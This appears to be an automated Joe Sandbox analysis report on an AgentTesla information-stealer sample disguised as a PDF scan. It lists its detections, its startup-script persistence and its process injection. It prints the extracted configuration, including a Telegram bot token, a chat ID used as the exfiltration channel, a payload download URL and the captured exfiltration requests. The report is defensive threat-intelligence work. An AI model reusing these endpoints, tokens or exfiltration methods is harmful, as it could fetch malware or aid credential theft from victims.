Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rScan_0984829339_PDF.exe

Overview

General Information

Sample name:rScan_0984829339_PDF.exe
Analysis ID:1534432
MD5:a89dce2412407f0bd1f4b9e575545aeb
SHA1:9ad65f7f6252c2df5c97b44000d12c988ec7d4a1
SHA256:c8c4a0f5bc0278f9392a4356ac121458f0f4d10420f65b468e7556b08c84ff5e
Tags:exeuser-Porcupine
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rScan_0984829339_PDF.exe (PID: 6272 cmdline: "C:\Users\user\Desktop\rScan_0984829339_PDF.exe" MD5: A89DCE2412407F0BD1F4B9E575545AEB)
    • InstallUtil.exe (PID: 1472 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 6236 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Guid.exe (PID: 5588 cmdline: "C:\Users\user\AppData\Roaming\Guid.exe" MD5: A89DCE2412407F0BD1F4B9E575545AEB)
      • InstallUtil.exe (PID: 6708 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendMessage?chat_id=1673719962"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2262633916.0000000002DA7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            00000002.00000002.2453773157.0000000002FDA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 46 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              2.2.InstallUtil.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                2.2.InstallUtil.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  2.2.InstallUtil.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    2.2.InstallUtil.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x332ce:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x33340:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x333ca:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x3345c:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x334c6:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x33538:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x335ce:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x3365e:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    5.2.Guid.exe.40bbf88.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 19 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs" , ProcessId: 6236, ProcessName: wscript.exe
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs" , ProcessId: 6236, ProcessName: wscript.exe

                      Data Obfuscation

                      barindex
                      Sigma detected: Drops script at startup location
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\rScan_0984829339_PDF.exe, ProcessId: 6272, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-15T21:32:13.214696+020028517791Malware Command and Control Activity Detected192.168.2.649739149.154.167.220443TCP
                      2024-10-15T21:32:32.320933+020028517791Malware Command and Control Activity Detected192.168.2.649831149.154.167.220443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-15T21:32:13.214696+020028528151Malware Command and Control Activity Detected192.168.2.649739149.154.167.220443TCP
                      2024-10-15T21:32:32.320933+020028528151Malware Command and Control Activity Detected192.168.2.649831149.154.167.220443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-15T21:32:13.216256+020028542811A Network Trojan was detected149.154.167.220443192.168.2.649739TCP
                      2024-10-15T21:32:32.322256+020028542811A Network Trojan was detected149.154.167.220443192.168.2.649831TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 5.2.Guid.exe.40bbf88.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendMessage?chat_id=1673719962"}
                      Source: Guid.exe.5588.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendMessage"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\Guid.exeReversingLabs: Detection: 31%
                      Multi AV Scanner detection for submitted file
                      Source: rScan_0984829339_PDF.exeReversingLabs: Detection: 31%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\Guid.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: rScan_0984829339_PDF.exeJoe Sandbox ML: detected
                      Source: rScan_0984829339_PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.6:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.6:49804 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49831 version: TLS 1.2
                      Source: rScan_0984829339_PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003DD5000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003D08000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000003306000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004030000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000003F78000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: rScan_0984829339_PDF.exe, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003DD5000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003D08000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000003306000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004030000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000003F78000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.6:49739 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.6:49739 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.6:49739
                      Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.6:49831 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.6:49831 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.6:49831
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficHTTP traffic detected: GET /hunziq/Sgtuwurbrz.mp3 HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dced2e8905a837Host: api.telegram.orgContent-Length: 924Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /hunziq/Sgtuwurbrz.mp3 HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dced2e9445f11aHost: api.telegram.orgContent-Length: 924Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /hunziq/Sgtuwurbrz.mp3 HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /hunziq/Sgtuwurbrz.mp3 HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: rubberpartsmanufacturers.com
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dced2e8905a837Host: api.telegram.orgContent-Length: 924Expect: 100-continueConnection: Keep-Alive
                      Source: InstallUtil.exe, 00000002.00000002.2453773157.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3430262414.00000000028DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2453773157.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3430262414.00000000028C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2449463464.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: InstallUtil.exe, 00000002.00000002.2453773157.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3430262414.00000000028C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2453773157.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2449463464.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3430262414.0000000002871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/
                      Source: InstallUtil.exe, 00000002.00000002.2453773157.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3430262414.00000000028C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000002F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rubberpartsmanufacturers.com
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000002F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rubberpartsmanufacturers.com/hunziq/Sgtuwurbrz.mp3
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000003018000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.6:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.6:49804 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49831 version: TLS 1.2

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 5.2.Guid.exe.40bbf88.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 5.2.Guid.exe.40bbf88.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: rScan_0984829339_PDF.exe
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeCode function: 0_2_05AB6E5B0_2_05AB6E5B
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeCode function: 0_2_0132D6580_2_0132D658
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeCode function: 0_2_013295380_2_01329538
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeCode function: 0_2_013295480_2_01329548
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeCode function: 0_2_01329B500_2_01329B50
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeCode function: 0_2_072BE3B00_2_072BE3B0
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeCode function: 0_2_072A001F0_2_072A001F
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeCode function: 0_2_072A00400_2_072A0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014793302_2_01479330
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01474A402_2_01474A40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01479AE02_2_01479AE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01473E282_2_01473E28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014741702_2_01474170
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0147D1102_2_0147D110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_065726F82_2_065726F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_065797082_2_06579708
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_065787A22_2_065787A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0657D4602_2_0657D460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_065752F82_2_065752F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06573B682_2_06573B68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_065700402_2_06570040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06572E602_2_06572E60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06574C182_2_06574C18
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0657B9202_2_0657B920
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066BA1982_2_066BA198
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0147D10A2_2_0147D10A
